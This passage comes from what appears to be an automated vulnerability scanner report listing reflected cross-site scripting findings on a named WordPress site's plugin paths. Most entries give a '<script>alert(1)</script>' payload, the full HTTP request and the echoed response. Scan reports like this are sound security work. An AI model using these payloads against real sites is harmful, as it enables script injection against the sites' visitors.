Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674574; expires=Thu, 02-Feb-2012 19:22:54 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site6f91c\"><script>alert(1)</script>89e1dc2587/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js" />
...[SNIP]...

4.219. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 246ce"><script>alert(1)</script>c071be92443 was submitted in the REST URL parameter 2. This input was echoed as 246ce\"><script>alert(1)</script>c071be92443 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content246ce"><script>alert(1)</script>c071be92443/plugins/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content246ce\"><script>alert(1)</script>c071be92443/plugins/superslider-postsincat/js/slideBox-v1.0.js" />
...[SNIP]...

4.220. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34091"><script>alert(1)</script>09174c8f3b0 was submitted in the REST URL parameter 3. This input was echoed as 34091\"><script>alert(1)</script>09174c8f3b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins34091"><script>alert(1)</script>09174c8f3b0/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins34091\"><script>alert(1)</script>09174c8f3b0/superslider-postsincat/js/slideBox-v1.0.js" />
...[SNIP]...

4.221. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da63"><script>alert(1)</script>ef4ebc3ad8b was submitted in the REST URL parameter 4. This input was echoed as 7da63\"><script>alert(1)</script>ef4ebc3ad8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat7da63"><script>alert(1)</script>ef4ebc3ad8b/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674582+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat7da63\"><script>alert(1)</script>ef4ebc3ad8b/js/slideBox-v1.0.js" />
...[SNIP]...

4.222. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a778"><script>alert(1)</script>914349c7fa1 was submitted in the REST URL parameter 5. This input was echoed as 3a778\"><script>alert(1)</script>914349c7fa1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js3a778"><script>alert(1)</script>914349c7fa1/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674584; expires=Thu, 02-Feb-2012 19:23:04 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js3a778\"><script>alert(1)</script>914349c7fa1/slideBox-v1.0.js" />
...[SNIP]...

4.223. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1dfd"><script>alert(1)</script>f981ff2d39 was submitted in the REST URL parameter 6. This input was echoed as e1dfd\"><script>alert(1)</script>f981ff2d39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.jse1dfd"><script>alert(1)</script>f981ff2d39 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.jse1dfd\"><script>alert(1)</script>f981ff2d39" />
...[SNIP]...

4.224. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3acc0"><script>alert(1)</script>5fc51608de0 was submitted in the REST URL parameter 1. This input was echoed as 3acc0\"><script>alert(1)</script>5fc51608de0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site3acc0"><script>alert(1)</script>5fc51608de0/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674581; expires=Thu, 02-Feb-2012 19:23:01 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site3acc0\"><script>alert(1)</script>5fc51608de0/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css" />
...[SNIP]...

4.225. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574e5"><script>alert(1)</script>2452676616d was submitted in the REST URL parameter 2. This input was echoed as 574e5\"><script>alert(1)</script>2452676616d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content574e5"><script>alert(1)</script>2452676616d/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content574e5\"><script>alert(1)</script>2452676616d/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css" />
...[SNIP]...

4.226. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f714"><script>alert(1)</script>39a0a2ffe53 was submitted in the REST URL parameter 3. This input was echoed as 2f714\"><script>alert(1)</script>39a0a2ffe53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins2f714"><script>alert(1)</script>39a0a2ffe53/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins2f714\"><script>alert(1)</script>39a0a2ffe53/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css" />
...[SNIP]...

4.227. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fda27"><script>alert(1)</script>618a4ef6632 was submitted in the REST URL parameter 4. This input was echoed as fda27\"><script>alert(1)</script>618a4ef6632 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincatfda27"><script>alert(1)</script>618a4ef6632/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincatfda27\"><script>alert(1)</script>618a4ef6632/plugin-data/superslider/ssPostinCat/default/default.css" />
...[SNIP]...

4.228. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad888"><script>alert(1)</script>85bc6e4dd3f was submitted in the REST URL parameter 5. This input was echoed as ad888\"><script>alert(1)</script>85bc6e4dd3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/plugin-dataad888"><script>alert(1)</script>85bc6e4dd3f/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/plugin-dataad888\"><script>alert(1)</script>85bc6e4dd3f/superslider/ssPostinCat/default/default.css" />
...[SNIP]...

4.229. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bf9"><script>alert(1)</script>06d6b0fc251 was submitted in the REST URL parameter 6. This input was echoed as 95bf9\"><script>alert(1)</script>06d6b0fc251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider95bf9"><script>alert(1)</script>06d6b0fc251/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider95bf9\"><script>alert(1)</script>06d6b0fc251/ssPostinCat/default/default.css" />
...[SNIP]...

4.230. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

